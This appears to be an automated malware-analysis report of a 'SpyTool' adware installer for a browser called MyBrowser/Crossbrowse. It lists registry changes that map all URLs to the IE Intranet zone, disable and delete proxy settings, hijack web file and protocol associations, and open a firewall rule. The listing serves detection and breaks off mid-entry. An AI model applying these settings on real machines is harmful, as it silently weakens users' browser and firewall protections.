[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B0 71 53 44 42 47 8B E0 F9 A0 B4 04 1D C0 FD 4E"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The SpyTool modifies IE security-zone settings to map all local web-nodes with no dots that are not assigned to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The SpyTool modifies IE security-zone settings to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The SpyTool modifies IE security-zone settings to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The SpyTool deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process 8819.exe:368 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Tempo]
"(Default)" = "Tempo"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Crossbrowse]
"Preinstall" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\CrossBrowser]
"Installation" = "1"
[HKCU\Software\Crossbrowse]
"Preinstall" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0D 98 73 21 25 40 56 E2 C1 7A F9 C5 99 89 41 92"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\5517]
"setup.exe" = "MyBrowser Installer"
The SpyTool modifies IE security-zone settings to map all local web-nodes with no dots that are not assigned to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The SpyTool modifies IE security-zone settings to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The SpyTool modifies IE security-zone settings to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The SpyTool deletes the following registry key(s):
[HKLM\SOFTWARE\Tempo]
The SpyTool deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process nssF.tmp:1488 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F3 52 4F D1 21 92 E2 C5 0E FC 52 D5 9E B8 52 00"
[HKLM\SOFTWARE\Crossbrowse]
"Preinstall" = "1"
[HKCU\Software\Crossbrowse]
"Preinstall" = "1"
The process setup.exe:828 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\InstallInfo]
"IconsVisible" = "1"
[HKCU\Software\Classes\ftp\shell]
"(Default)" = "open"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKLM\SOFTWARE\MyBrowser\Installer]
"Name" = "MyBrowser"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities]
"ApplicationDescription" = "MyBrowser is a web browser that runs webpages and applications with lightning speed. It's fast, stable, and easy to use. Browse the web more safely with malware and phishing protection built into MyBrowser."
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"smsto" = "CRSBRWSHTML"
[HKCR\https\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe -- %1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"DisplayIcon" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKLM\SOFTWARE\MyBrowser\Installer]
"UninstallArguments" = " --uninstall --system-level"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"VersionMinor" = "95"
[HKCR\.html\OpenWithProgids]
"CRSBRWSHTML" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"DisplayVersion" = "39.5.2171.95"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities]
"ApplicationName" = "MyBrowser"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"InstallDate" = "20150925"
[HKCU\Software\Classes\http\shell\open\ddeexec]
"(Default)" = ""
[HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components]
"StubPath" = "%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\chrmstp.exe --configure-user-settings --verbose-logging --system-level"
[HKCR\.html]
"(Default)" = "CRSBRWSHTML"
[HKCU\Software\Classes\ftp]
"URL Protocol" = ""
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"nntp" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\FileAssociations]
".xhtml" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"mailto" = "CRSBRWSHTML"
[HKCU\Software\Classes\.xht]
"(Default)" = "CRSBRWSHTML"
[HKCU\Software\Classes\ftp\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe -- %1"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsc1C.tmp\registry.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsc1C.tmp\, , \??\%Program Files%\MyBrowser\MyBrowser,"
[HKCU\Software\Classes\.html]
"(Default)" = "CRSBRWSHTML"
[HKCU\Software\Classes\ftp\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"VersionMajor" = "2171"
[HKCU\Software\Classes\.shtml]
"(Default)" = "CRSBRWSHTML"
[HKCU\Software\Classes\https\shell\open\ddeexec]
"(Default)" = ""
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe"
[HKCR\CLSID\{2A563926-CF4B-4363-A760-F71E46205B7E}\LocalServer32]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\delegate_execute.exe"
[HKCR\CLSID\{2A563926-CF4B-4363-A760-F71E46205B7E}]
"(Default)" = "CommandExecuteImpl Class"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"irc" = "CRSBRWSHTML"
[HKCR\ftp\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"https" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components]
"IsInstalled" = "1"
"Version" = "24,0,0,0"
[HKCR\https\shell]
"(Default)" = "open"
[HKCR\.xhtml]
"(Default)" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\mybrowser.exe]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe"
[HKCR\.xht\OpenWithProgids]
"CRSBRWSHTML" = ""
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\Startmenu]
"StartMenuInternet" = "MyBrowser"
[HKCU\Software\Classes\http\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKLM\SOFTWARE\RegisteredApplications]
"MyBrowser" = "Software\Clients\StartMenuInternet\MyBrowser\Capabilities"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"webcal" = "CRSBRWSHTML"
[HKLM\SOFTWARE\MyBrowser\Installer]
"InstallerError" = "0"
[HKCR\ftp]
"URL Protocol" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
[HKCR\ftp\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe -- %1"
[HKCR\HTTP\shell\open\ddeexec]
"(Default)" = ""
[HKLM\SOFTWARE\MyBrowser\Installer]
"InstallerResult" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"UninstallString" = "%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\setup.exe --uninstall --system-level"
[HKCR\https\shell\open\ddeexec]
"(Default)" = ""
[HKCR\CRSBRWSHTML\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"sms" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\mybrowser.exe]
"Path" = "%Program Files%\MyBrowser\MyBrowser\Application"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F2 D2 EF A0 E0 6D F4 46 9C 8C A1 A1 14 43 F1 C4"
[HKLM\SOFTWARE\MyBrowser\Installer]
"InstallerExtraCode1" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Classes\https\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKCR\HTTP\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe -- %1"
[HKCR\https\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKCR\CRSBRWSHTML\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe -- %1"
[HKCR\.shtml\OpenWithProgids]
"CRSBRWSHTML" = ""
[HKCU\Software\Classes\https\shell]
"(Default)" = "open"
[HKCR\.webp\OpenWithProgids]
"CRSBRWSHTML" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"NoModify" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\FileAssociations]
".htm" = "CRSBRWSHTML"
[HKCR\HTTP]
"URL Protocol" = ""
[HKCU\Software\Classes\http\shell]
"(Default)" = "open"
[HKCR\HTTP\shell]
"(Default)" = "open"
[HKLM\SOFTWARE\MyBrowser\Installer]
"oopcrashes" = "1"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"mms" = "CRSBRWSHTML"
[HKCU\Software\Classes\http]
"URL Protocol" = ""
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\InstallInfo]
"ReinstallCommand" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe --make-default-browser"
[HKCR\.shtml]
"(Default)" = "CRSBRWSHTML"
[HKCU\Software\Classes\https]
"URL Protocol" = ""
[HKLM\SOFTWARE\MyBrowser\Installer]
"InstallerSuccessLaunchCmdLine" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe"
"UninstallString" = "%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\setup.exe"
[HKCR\.xht]
"(Default)" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"urn" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components]
"(Default)" = "MyBrowser"
[HKLM\SOFTWARE\MyBrowser\Installer]
"ap" = "-stage:preconditions"
[HKCR\HTTP\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"tel" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"NoRepair" = "1"
[HKCU\Software\Classes\.htm]
"(Default)" = "CRSBRWSHTML"
[HKCR\https]
"URL Protocol" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\FileAssociations]
".xht" = "CRSBRWSHTML"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCR\.htm]
"(Default)" = "CRSBRWSHTML"
[HKCR\.htm\OpenWithProgids]
"CRSBRWSHTML" = ""
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\FileAssociations]
".webp" = "CRSBRWSHTML"
[HKCU\Software\Classes\ftp\shell\open\ddeexec]
"(Default)" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"Publisher" = "The MyBrowser Authors"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"news" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"Version" = "39.5.2171.95"
[HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components]
"Localized Name" = "MyBrowser"
[HKLM\SOFTWARE\Clients\StartMenuInternet]
"(Default)" = "MyBrowser"
[HKCR\CRSBRWSHTML]
"(Default)" = "MyBrowser HTML Document"
[HKLM\SOFTWARE\MyBrowser\Installer]
"pv" = "39.5.2171.95"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"DisplayName" = "MyBrowser"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\FileAssociations]
".shtml" = "CRSBRWSHTML"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\InstallInfo]
"ShowIconsCommand" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe --show-icons"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"ftp" = "CRSBRWSHTML"
[HKCR\ftp\shell\open\ddeexec]
"(Default)" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Classes\.xhtml]
"(Default)" = "CRSBRWSHTML"
[HKCR\ftp\shell]
"(Default)" = "open"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser]
"(Default)" = "MyBrowser"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\InstallInfo]
"HideIconsCommand" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe --hide-icons"
[HKCR\.xhtml\OpenWithProgids]
"CRSBRWSHTML" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"InstallLocation" = "%Program Files%\MyBrowser\MyBrowser\Application"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCR\CLSID\{2A563926-CF4B-4363-A760-F71E46205B7E}\LocalServer32]
"ServerExecutable" = "%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\delegate_execute.exe"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities]
"ApplicationIcon" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"http" = "CRSBRWSHTML"
[HKCU\Software\Clients\StartmenuInternet]
"(Default)" = "MyBrowser"
[HKCU\Software\Classes\https\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe -- %1"
[HKCU\Software\Classes\http\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe -- %1"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\FileAssociations]
".html" = "CRSBRWSHTML"
Adds a rule to the Windows Firewall which allows any network activity:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Program Files%\MyBrowser\MyBrowser\Application]
"mybrowser.exe" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe:*:Enabled:MyBrowser"
The SpyTool deletes the following value(s) in system registry:
[HKLM\SOFTWARE\MyBrowser\Installer]
"ap"
"InstallerExtraCode1"
The process nsp45.tmp:596 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 24 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F2 A0 43 49 52 DC 06 2B 32 72 07 86 97 D3 C8 D4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The SpyTool modifies IE security zone settings to map all local web nodes (names with no dots) which do not belong to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The SpyTool modifies IE security zone settings to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The SpyTool modifies IE security zone settings to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The SpyTool deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process taskkill.exe:1408 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0E C2 4F ED 84 DE 61 F6 85 8C B7 6E D7 D9 57 BF"
The process taskkill.exe:248 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C0 40 25 A9 59 49 D4 95 5F D1 44 C1 BA 2C 69 D2"
The process taskkill.exe:1092 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
